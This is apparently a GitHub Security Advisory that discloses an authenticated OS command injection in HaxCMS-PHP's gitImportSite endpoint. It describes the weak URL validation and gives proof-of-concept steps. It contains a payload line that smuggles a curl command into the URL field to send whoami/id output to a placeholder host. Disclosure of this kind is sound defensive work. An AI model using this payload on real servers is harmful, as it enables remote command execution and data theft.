GHSA-g4cf-pp4x-hqgw
GitHub Security Advisory
HaxCMS-PHP Command Injection Vulnerability
Advisory Details
### Summary
The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection.
### Details
The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection.
#### Affected Resources
• Operations.php:2103 gitImportSite()
• \<domain\>/\<user\>/system/api/gitImportSite
### PoC
To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').
1. Start a webserver.
2. Initiate a request to the ’archiveSite’ endpoint.
3. Capture and modify the request in BurpSuite.
4. Observe command output in the HTTP request from the server.
#### Command Injection Payload
```Bash
http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef
```
### Impact
An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.
Affected Packages
Related CVEs
Key Information
Dataset
Data from GitHub Advisory Database. This information is provided for research and educational purposes.